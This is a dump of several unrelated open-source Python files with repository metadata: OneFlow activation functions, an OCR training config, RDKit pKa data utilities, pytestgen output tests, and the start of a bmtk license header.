>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
def __init__(self):
super().__init__()
self._op = flow.builtin_op("gelu").Input("in").Output("out").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("gelu")
@register_tensor_op("gelu")
@experimental_api
def gelu_op(x):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
return GELU()(x)
@oneflow_export("nn.Sigmoid")
@experimental_api
class Sigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
m = flow.nn.Sigmoid() # or y = flow.sigmoid(x)
y = m(x)
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
def __init__(self):
super().__init__()
self._op = flow.builtin_op("sigmoid").Input("in").Output("out").Build()
def forward(self, x):
return self._op(x)[0]
@oneflow_export("sigmoid")
@register_tensor_op("sigmoid")
@experimental_api
def sigmoid_op(x):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
y = x.sigmoid()
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
return Sigmoid()(x)
@oneflow_export("nn.Hardsigmoid")
@experimental_api
class Hardsigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Hardsigmoid}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
1 & \text{ if } x \ge +3 \\
\frac{x}{6} + \frac{1}{2} & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardsigmoid = flow.nn.Hardsigmoid()
>>> out = hardsigmoid(input).numpy()
>>> print(out)
[0.41666666 0.5 0.5833333 ]
"""
def __init__(self, inplace: bool = False):
super().__init__()
self._op = flow.builtin_op("hardsigmoid").Input("in").Output("out").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.Softmax")
@experimental_api
class Softmax(Module):
def __init__(self, dim: Optional[int] = None):
super().__init__()
self.axis = -1 if dim is None else dim
self._op = flow.builtin_op("softmax").Input("in").Output("out").Build()
self._transpose_op = (
flow.builtin_op("transpose")
.Input("input")
.Output("output")
.Attr("perm", [])
.Build()
)
def forward(self, x):
need_transpose, permute = _softmax_need_transpose(x, self.axis)
if need_transpose:
x = self._transpose_op(x, perm=permute)[0]
res = self._op(x)[0]
if need_transpose:
res = self._transpose_op(res, perm=permute)[0]
return res
@oneflow_export("softmax")
@register_tensor_op("softmax")
@experimental_api
def softmax_op(tensor, dim=None):
r"""Applies the Softmax function to an n-dimensional input Tensor
rescaling them so that the elements of the n-dimensional output Tensor
lie in the range [0,1] and sum to 1.
Softmax is defined as:
.. math::
\text{Softmax}(x_{i}) = \frac{\exp(x_i)}{\sum_j \exp(x_j)}
When the input Tensor is a sparse tensor then the unspecifed
values are treated as ``-inf``.
Shape:
- Input: :math:`(*)` where `*` means, any number of additional
dimensions
- Output: :math:`(*)`, same shape as the input
Returns:
a Tensor of the same dimension and shape as the input with
values in the range [0, 1]
Args:
dim (int): A dimension along which Softmax will be computed (so every slice
along dim will sum to 1).
For example:
.. code-block:: python
import oneflow as flow
import numpy as np
m = flow.nn.Softmax(dim = 2)
x = flow.Tensor(
np.array(
[[[[-0.46716809, 0.40112534, 0.61984003],
[-1.31244969, -0.42528763, 1.47953856]]],
[[[ 1.02978742, -0.49383053, 1.88214159],
[ 1.35351622, -1.46251285, -1.40751374]]]]
)
)
y = m(x)
# [[[[0.6995764 0.6955959 0.29740235]
# [0.3004236 0.30440408 0.7025977 ]]]
# [[[0.4197673 0.7248568 0.96407217]
# [0.58023274 0.27514324 0.03592779]]]]
"""
return Softmax(dim)(tensor)
@oneflow_export("nn.LogSoftmax")
@experimental_api
class LogSoftmax(Module):
r"""Applies the :math:`\log(\text{Softmax}(x))` function to an n-dimensional
input Tensor.
The LogSoftmax formulation can be simplified as:
.. math::
\text{LogSoftmax}(x_{i}) = \log\left(\frac{\exp(x_i) }{ \sum_j \exp(x_j)} \right)
Args:
dim (int): A dimension along which LogSoftmax will be computed.
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
m = flow.nn.LogSoftmax(dim=1)
x = flow.Tensor(
np.array(
[[ 0.4296, -1.1957, 2.5463],
[ 1.2552, -1.5747, 0.6923]]
)
)
y = m(x)
# [[-2.251349 -3.8766491 -0.13464898]
# [-0.48770458 -3.3176045 -1.0506046 ]]
"""
def __init__(
self, dim: Optional[int] = 1,
):
super().__init__()
self.dim = dim
self._op = (
flow.builtin_op("transpose")
.Input("input")
.Output("output")
.Attr("perm", [])
.Build()
)
def __setstate__(self, state):
self.__dict__.update(state)
if not hasattr(self, "dim"):
self.dim = None
def forward(self, x):
need_transpose, permute = _softmax_need_transpose(x, self.dim)
if need_transpose:
x = self._op(x, perm=permute)[0]
x = x.softmax()
res = x.log()
if need_transpose:
res = self._op(res, perm=permute)[0]
return res
def extra_repr(self):
return "dim={dim}".format(dim=self.dim)
@oneflow_export("nn.LogSigmoid")
@experimental_api
class LogSigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right)
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> logsigmoid = flow.nn.LogSigmoid()
>>> out = logsigmoid(input).numpy()
>>> print(out)
[-0.974077 -0.6931472 -0.47407696]
"""
def __init__(self):
super().__init__()
def forward(self, x):
sigmoid_res = flow.experimental.sigmoid(x)
res = flow.experimental.log(sigmoid_res)
return res
@oneflow_export("nn.Softplus")
@experimental_api
class Softplus(Module):
r"""Applies the element-wise function:
.. math::
\text{Softplus}(x) = \frac{1}{\beta} * \log(1 + \exp(\beta * x))
SoftPlus is a smooth approximation to the ReLU function and can be used
to constrain the output of a machine to always be positive.
For numerical stability the implementation reverts to the linear function
when :math:`input \times \beta > threshold`.
Args:
beta: the :math:`\beta` value for the Softplus formulation. Default: 1
threshold: values above this revert to a linear function. Default: 20
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> softplus = flow.nn.Softplus()
>>> out = softplus(input).numpy()
>>> print(out)
[0.474077 0.6931472 0.974077 ]
"""
def __init__(self, beta: int = 1, threshold: int = 20):
super().__init__()
self.beta = beta
self.threshold = threshold
def forward(self, x):
return flow.experimental.where(
x * self.beta > self.threshold,
x,
1
/ self.beta
* flow.experimental.log(1.0 + flow.experimental.exp(self.beta * x)),
)
@oneflow_export("nn.Hardswish")
@experimental_api
class Hardswish(Module):
r"""Applies the hardswish function, element-wise, as described in the paper:
`Searching for MobileNetV3`_.
.. math::
\text{Hardswish}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
x & \text{ if } x \ge +3 \\
x*(x+3)/6 & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardswish = flow.nn.Hardswish()
>>> out = hardswish(input).numpy()
>>> print(out)
[-0.20833333 0. 0.29166666]
.. _`Searching for MobileNetV3`:
https://arxiv.org/abs/1905.02244
"""
def __init__(self, inplace: bool = False):
super().__init__()
self._op = flow.builtin_op("hardswish").Input("in").Output("out").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.Hardtanh")
@experimental_api
class Hardtanh(Module):
r"""
Applies the HardTanh function element-wise
HardTanh is defined as:
.. math::
\text{HardTanh}(x) = \begin{cases}
1 & \text{ if } x > 1 \\
-1 & \text{ if } x < -1 \\
x & \text{ otherwise } \\
\end{cases}
The range of the linear region :math:`[-1, 1]` can be adjusted using
:attr:`min_val` and :attr:`max_val`.
Args:
min_val: minimum value of the linear region range. Default: -1
max_val: maximum value of the linear region range. Default: 1
inplace: can optionally do the operation in-place. Default: ``False``
Keyword arguments :attr:`min_value` and :attr:`max_value`
have been deprecated in favor of :attr:`min_val` and :attr:`max_val`.
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.Hardtanh()
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 1. 1. ]
"""
def __init__(
self,
min_val: float = -1,
max_val: float = 1,
inplace: bool = False,
min_value: Optional[float] = None,
max_value: Optional[float] = None,
):
super().__init__()
if min_value is not None:
warnings.warn(
"keyword argument min_value is deprecated and rename to min_val"
)
min_val = min_value
if max_value is not None:
warnings.warn(
"keyword argument max_value is deprecated and rename to max_val"
)
max_val = max_value
self._op = (
flow.builtin_op("hardtanh")
.Input("in")
.Attr("min_val", min_val)
.Attr("max_val", max_val)
.Output("out")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.LeakyReLU")
@experimental_api
class LeakyReLU(Module):
r"""Applies the element-wise function:
.. math::
\text{LeakyReLU}(x) = \max(0, x) + \text{negative_slope} * \min(0, x)
or
.. math::
\text{LeakyRELU}(x) = \begin{cases}
x, & \text{ if } x \geq 0 \\
\text{negative_slope} \times x, & \text{ otherwise }
\end{cases}
Args:
negative_slope: Controls the angle of the negative slope. Default: 1e-2
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.LeakyReLU(0.1)
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 3. 4. ]
"""
def __init__(self, negative_slope: float = 1e-2, inplace: bool = False):
super().__init__()
self._op = (
flow.builtin_op("leaky_relu")
.Input("x")
.Attr("alpha", negative_slope)
.Output("y")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
if __name__ == "__main__":
import doctest
doctest.testmod()
| 4,998 | 1 | 854 |
b94570549fff0f323fca932142442f9e2286a38b | 1,362 | py | Python | demo/text_spotting/mask_rcnn_spot/configs/mask_rcnn_spotter_pretrain.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | null | null | null | demo/text_spotting/mask_rcnn_spot/configs/mask_rcnn_spotter_pretrain.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | null | null | null | demo/text_spotting/mask_rcnn_spot/configs/mask_rcnn_spotter_pretrain.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | null | null | null | """
####################################################################################################
# Copyright Info : Copyright (c) Davar Lab @ Hikvision Research Institute. All rights reserved.
# Filename : mango_r50_ete_pretrain.py
# Abstract : Model settings for mask rcnn spotter end-to-end pretrain on synthdata.
# Current Version: 1.0.0
# Date : 2020-06-24
######################################################################################################
"""
_base_ = './__base__.py'
data = dict(
samples_per_gpu=4,
workers_per_gpu=4,
train=dict(
ann_file=[
'/path/to/datalist/synthtext_80w.json',
],
img_prefix=[
'/path/to/SynthText/',
]
),
val=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
),
test=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
)
)
optimizer=dict(lr=1e-3)
lr_config = dict(step=[2, 3])
runner = dict(max_epochs=4)
checkpoint_config = dict(interval=1, filename_tmpl='checkpoint/res50_ete_pretrain_epoch_{}.pth')
work_dir = '/path/to/workspace/log/'
load_from = '/path/to/Model_Zoo/mask_rcnn_r50_fpn_2x_20181010-41d35c05.pth'
| 34.923077 | 102 | 0.553598 | """
####################################################################################################
# Copyright Info : Copyright (c) Davar Lab @ Hikvision Research Institute. All rights reserved.
# Filename : mango_r50_ete_pretrain.py
# Abstract : Model settings for mask rcnn spotter end-to-end pretrain on synthdata.
# Current Version: 1.0.0
# Date : 2020-06-24
######################################################################################################
"""
_base_ = './__base__.py'
data = dict(
samples_per_gpu=4,
workers_per_gpu=4,
train=dict(
ann_file=[
'/path/to/datalist/synthtext_80w.json',
],
img_prefix=[
'/path/to/SynthText/',
]
),
val=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
),
test=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
)
)
optimizer=dict(lr=1e-3)
lr_config = dict(step=[2, 3])
runner = dict(max_epochs=4)
checkpoint_config = dict(interval=1, filename_tmpl='checkpoint/res50_ete_pretrain_epoch_{}.pth')
work_dir = '/path/to/workspace/log/'
load_from = '/path/to/Model_Zoo/mask_rcnn_r50_fpn_2x_20181010-41d35c05.pth'
| 0 | 0 | 0 |
40b5da6d9b057ada5f1d37ec3aedaa657578ee0d | 3,906 | py | Python | mol_property/pka/data_utils.py | Mana-bio/mol_property | 16c83bf9c6c03e25695cc913c68ec23ff704f2bc | [
"MIT"
] | 8 | 2019-08-24T22:19:53.000Z | 2022-03-20T06:21:55.000Z | mol_property/pka/data_utils.py | Mana-bio/mol_property | 16c83bf9c6c03e25695cc913c68ec23ff704f2bc | [
"MIT"
] | 1 | 2021-09-08T20:43:06.000Z | 2021-09-26T22:38:51.000Z | mol_property/pka/data_utils.py | Mana-bio/mol_property | 16c83bf9c6c03e25695cc913c68ec23ff704f2bc | [
"MIT"
] | 5 | 2019-08-24T22:24:02.000Z | 2022-03-20T06:22:06.000Z | # -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
import rdkit
from rdkit import Chem, DataStructs
from rdkit.Chem import AllChem, Descriptors
DATA_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "./train/data/pKaInWater.csv")
| 40.268041 | 117 | 0.592678 | # -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
import rdkit
from rdkit import Chem, DataStructs
from rdkit.Chem import AllChem, Descriptors
DATA_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "./train/data/pKaInWater.csv")
def rdkit_numpy_convert(fp):
output = []
for f in fp:
arr = np.zeros((1,))
DataStructs.ConvertToNumpyArray(f, arr)
output.append(arr)
return np.asarray(output)
class DataUtils(object):
def __init__(self, filepath=DATA_PATH):
self.filepath = filepath
self.df_pka = pd.read_csv(self.filepath)
self.df_pka_acidic = self.df_pka[self.df_pka["basicOrAcidic"] == "acidic"]
self.df_pka_basic = self.df_pka[self.df_pka["basicOrAcidic"] == "basic"]
def describe(self):
print("Unique: {} / {}".format(len(self.df_pka["Smiles"].unique()),
self.df_pka.shape[0]))
print("basic Unique: {} / {}".format(len(self.df_pka_basic["Smiles"].unique()),
self.df_pka_basic.shape[0]))
acidic_only_cnt = len(set(self.df_pka_acidic["Smiles"].unique()) - set(self.df_pka_basic["Smiles"].unique()))
basic_only_cnt = len(set(self.df_pka_basic["Smiles"].unique()) - set(self.df_pka_acidic["Smiles"].unique()))
both_pka_cnt = len(set(self.df_pka_basic["Smiles"].unique()) & set(self.df_pka_acidic["Smiles"].unique()))
print("acidic_only_cnt: {}, basic_only_cnt: {}, both_pka_cnt: {}".format(acidic_only_cnt, basic_only_cnt,
both_pka_cnt))
def get_regression_data(self, data_category="all", feature_type="morgan"):
'''
:param data_category: all | acidic_only | basic_only
:param type: morgan | macc | morgan+macc
:return:
'''
df_tmp = self.df_pka
if data_category == "basic_only":
df_tmp = self.df_pka_basic
elif data_category == "acidic_only":
df_tmp = self.df_pka_acidic
mols = []
targets = []
for row in df_tmp[["pKa", "Smiles"]].iterrows():
pka, smi = row[1]
mol = Chem.MolFromSmiles(smi)
if mol is None:
print(smi)
else:
mols.append(mol)
targets.append(pka)
return self.get_molecular_features(mols, feature_type), targets
def get_classification_data(self, feature_type="morgan+macc"):
'''
:param type: morgan | macc | morgan+macc
:return:
'''
smi_dict = {}
for row in self.df_pka[["basicOrAcidic", "Smiles"]].iterrows():
basicOrAcidic, smi = row[1]
if Chem.MolFromSmiles(smi) is not None:
if smi not in smi_dict:
smi_dict[smi] = {"basic": 0, "acidic": 0}
smi_dict[smi][basicOrAcidic] = 1
df_smi = pd.DataFrame(smi_dict).transpose()
return self.get_molecular_features([Chem.MolFromSmiles(mol) for mol in df_smi.index], feature_type), \
df_smi["acidic"].values, df_smi["basic"].values
@staticmethod
def get_molecular_features(mols, feature_type="morgan+macc"):
'''
:param mols: moleculars
:param feature_type:
:return: morgan | macc | morgan+macc
'''
fp_morgan = [AllChem.GetMorganFingerprintAsBitVect(mol, 2, nBits=1024) for mol in mols]
fp_macc = [AllChem.GetMACCSKeysFingerprint(mol) for mol in mols]
if feature_type == "morgan":
return rdkit_numpy_convert(fp_morgan)
elif feature_type == "macc":
return rdkit_numpy_convert(fp_macc)
elif feature_type == "morgan+macc":
return np.concatenate([rdkit_numpy_convert(fp_morgan), rdkit_numpy_convert(fp_macc)], axis=1)
| 1,297 | 2,293 | 46 |
a4683567b2e99fc407027a44e5ea64574ddf5871 | 940 | py | Python | tests/base_tests/multipolygon_tests/test_contains.py | lycantropos/gon | b3f811ece5989d1623b17d633a84071fbff6dd69 | [
"MIT"
] | 10 | 2020-07-18T12:55:52.000Z | 2022-03-20T07:09:10.000Z | tests/base_tests/multipolygon_tests/test_contains.py | lycantropos/gon | b3f811ece5989d1623b17d633a84071fbff6dd69 | [
"MIT"
] | 52 | 2019-07-11T16:59:01.000Z | 2022-03-29T19:41:59.000Z | tests/base_tests/multipolygon_tests/test_contains.py | lycantropos/gon | b3f811ece5989d1623b17d633a84071fbff6dd69 | [
"MIT"
] | 1 | 2020-03-22T12:56:07.000Z | 2020-03-22T12:56:07.000Z | from typing import Tuple
from hypothesis import given
from gon.base import (Multipolygon,
Point)
from tests.utils import equivalence
from . import strategies
@given(strategies.multipolygons)
@given(strategies.multipolygons_with_points)
| 28.484848 | 79 | 0.719149 | from typing import Tuple
from hypothesis import given
from gon.base import (Multipolygon,
Point)
from tests.utils import equivalence
from . import strategies
@given(strategies.multipolygons)
def test_vertices(multipolygon: Multipolygon) -> None:
assert all(vertex in multipolygon
for polygon in multipolygon.polygons
for vertex in polygon.border.vertices)
assert all(vertex in multipolygon
for polygon in multipolygon.polygons
for hole in polygon.holes
for vertex in hole.vertices)
@given(strategies.multipolygons_with_points)
def test_indexing(multipolygon_with_point: Tuple[Multipolygon, Point]) -> None:
multipolygon, point = multipolygon_with_point
before_indexing = point in multipolygon
multipolygon.index()
after_indexing = point in multipolygon
assert equivalence(before_indexing, after_indexing)
| 632 | 0 | 44 |
0d7a3e5a79ba80bc82f905112ac0ea79d2da3cf1 | 531 | py | Python | src/options.py | StrinTH/DrHelp | 76cdcd549f6c8ad6315e5c4557793c622a833c6a | [
"MIT"
] | 1 | 2021-12-02T15:04:08.000Z | 2021-12-02T15:04:08.000Z | src/options.py | StrinTH/DrHelp | 76cdcd549f6c8ad6315e5c4557793c622a833c6a | [
"MIT"
] | null | null | null | src/options.py | StrinTH/DrHelp | 76cdcd549f6c8ad6315e5c4557793c622a833c6a | [
"MIT"
] | 1 | 2021-12-02T15:04:09.000Z | 2021-12-02T15:04:09.000Z | from default_data import default_data
values={1:str(default_data.sample_id),2:default_data.sample_type,3:default_data.report_type,4:default_data.doc_type }
set_options = {1:"id", 2:"type", 3:"report", 4:"doc"}
get_options = {1: "name", 2: "intro", 3: "gene", 4: "stem-loop", 5: "peptide", 6: "cds", 7: "source", 8: "comment", 9: "all"}
cases = {0:"exit",1:"cls",2:"get",3:"help",4:"set",5:"visualize",6: "ftp",7: "options", 8: "fetch", 9: "searchd", 10: "searchl"}
error_key = {0: "Your browsing activity is empty.", 1: "Error404"} | 88.5 | 128 | 0.65725 | from default_data import default_data
values={1:str(default_data.sample_id),2:default_data.sample_type,3:default_data.report_type,4:default_data.doc_type }
set_options = {1:"id", 2:"type", 3:"report", 4:"doc"}
get_options = {1: "name", 2: "intro", 3: "gene", 4: "stem-loop", 5: "peptide", 6: "cds", 7: "source", 8: "comment", 9: "all"}
cases = {0:"exit",1:"cls",2:"get",3:"help",4:"set",5:"visualize",6: "ftp",7: "options", 8: "fetch", 9: "searchd", 10: "searchl"}
error_key = {0: "Your browsing activity is empty.", 1: "Error404"} | 0 | 0 | 0 |
1bcfd676504406ba19e350f8d7e47ab9e71aaa8d | 4,179 | py | Python | tests/pytestgen/test_output.py | notionparallax/pytestgen | 52821ac1ed3aa4864fa47af9dd1825f92d4367d7 | [
"MIT"
] | 5 | 2019-10-20T19:58:50.000Z | 2021-12-15T00:44:41.000Z | tests/pytestgen/test_output.py | notionparallax/pytestgen | 52821ac1ed3aa4864fa47af9dd1825f92d4367d7 | [
"MIT"
] | 2 | 2020-02-02T12:23:37.000Z | 2021-12-13T23:58:42.000Z | tests/pytestgen/test_output.py | notionparallax/pytestgen | 52821ac1ed3aa4864fa47af9dd1825f92d4367d7 | [
"MIT"
] | 2 | 2020-05-18T13:56:30.000Z | 2021-12-15T00:44:46.000Z | from ast import FunctionDef
from os import path
from munch import munchify
from pyfakefs.pytest_plugin import fs
import pytest
from pytestgen.load import PyTestGenInputFile
from pytestgen.parse import PyTestGenParsedSet, PyTestGenParsedFile, get_existing_test_functions
import pytestgen.output
from fixtures import mock_module_testable_func, mock_class_testable_func
@pytest.fixture
@pytest.fixture
| 40.572816 | 96 | 0.767408 | from ast import FunctionDef
from os import path
from munch import munchify
from pyfakefs.pytest_plugin import fs
import pytest
from pytestgen.load import PyTestGenInputFile
from pytestgen.parse import PyTestGenParsedSet, PyTestGenParsedFile, get_existing_test_functions
import pytestgen.output
from fixtures import mock_module_testable_func, mock_class_testable_func
@pytest.fixture
def mock_parsed_file(mock_module_testable_func, mock_class_testable_func):
return PyTestGenParsedFile(
[mock_module_testable_func(),
mock_class_testable_func()], PyTestGenInputFile("a_file.py", "a_dir"))
@pytest.fixture
def mock_parsed_set(mock_parsed_file):
fake_input_set = munchify({"output_dir": "output"})
return PyTestGenParsedSet([mock_parsed_file], fake_input_set)
def test_output_tests(fs, mock_parsed_set, monkeypatch):
pytestgen.output.output_tests(mock_parsed_set)
test_file_path = path.join("output", "a_dir", "test_a_file.py")
assert path.exists(test_file_path) == True, "test file did not exist"
# we need to patch FunctionDef back in, it was patched out in the
# 'mock_class_testable_func' fixture used in 'mock_parsed_set'
# otherwise isinstance() for FunctionDef will fail in
# get_existing_test_functions()
monkeypatch.setattr(pytestgen.parse.ast, "FunctionDef", FunctionDef)
outputted_funcs = get_existing_test_functions(test_file_path)
assert outputted_funcs == [
"test_a_test_function", "test_testclass_a_class_test_function"
]
def test_output_tests_include(fs, mock_parsed_set, monkeypatch):
pytestgen.output.output_tests(mock_parsed_set, include=["a_test_function"])
test_file_path = path.join("output", "a_dir", "test_a_file.py")
assert path.exists(test_file_path) == True, "test file did not exist"
# we need to patch FunctionDef back in, it was patched out in the
# 'mock_class_testable_func' fixture used in 'mock_parsed_set'
# otherwise isinstance() for FunctionDef will fail in
# get_existing_test_functions()
monkeypatch.setattr(pytestgen.parse.ast, "FunctionDef", FunctionDef)
outputted_funcs = get_existing_test_functions(test_file_path)
assert outputted_funcs == ["test_a_test_function"]
def test_output_parsed_file_nonexist(fs, mock_parsed_file, monkeypatch):
test_file_path = path.join("output", "a_dir", "test_a_file.py")
pytestgen.output._output_parsed_file(mock_parsed_file, "output")
assert path.exists(test_file_path) == True, "test file did not exist"
# we need to patch FunctionDef back in, it was patched out in the
# 'mock_class_testable_func' fixture used in 'mock_parsed_set'
# otherwise isinstance() for FunctionDef will fail in
# get_existing_test_functions()
monkeypatch.setattr(pytestgen.parse.ast, "FunctionDef", FunctionDef)
outputted_funcs = get_existing_test_functions(test_file_path)
assert outputted_funcs == [
"test_a_test_function", "test_testclass_a_class_test_function"
]
def test_output_parsed_file_exists(fs, mock_parsed_file, monkeypatch):
test_file_path = path.join("output", "a_dir", "test_a_file.py")
fs.create_file(mock_parsed_file.input_file.get_test_file_path("output"))
pytestgen.output._output_parsed_file(mock_parsed_file, "output")
assert path.exists(test_file_path) == True, "test file did not exist"
# we need to patch FunctionDef back in, it was patched out in the
# 'mock_class_testable_func' fixture used in 'mock_parsed_set'
# otherwise isinstance() for FunctionDef will fail in
# get_existing_test_functions()
monkeypatch.setattr(pytestgen.parse.ast, "FunctionDef", FunctionDef)
outputted_funcs = get_existing_test_functions(test_file_path)
assert outputted_funcs == [
"test_a_test_function", "test_testclass_a_class_test_function"
]
def test_ensure_dir_non_exist(fs):
pytestgen.output._ensure_dir(path.join("test_dir", "test_name.py"))
assert path.exists("test_dir") == True
def test_ensure_dir_exist(fs):
fs.create_dir("test_dir")
pytestgen.output._ensure_dir(path.join("test_dir", "test_name.py"))
assert path.exists("test_dir") == True | 3,586 | 0 | 182 |
071e88c7c8b0ef8617a798c4d21554568522c26c | 13,856 | py | Python | bmtk/utils/sonata/file_root.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | 216 | 2017-10-03T17:02:42.000Z | 2022-03-20T03:35:48.000Z | bmtk/utils/sonata/file_root.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | 92 | 2018-03-19T10:14:18.000Z | 2022-01-29T15:21:47.000Z | bmtk/utils/sonata/file_root.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | 97 | 2017-10-03T22:15:06.000Z | 2022-03-23T21:03:26.000Z | # Copyright 2017. Allen Institute. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
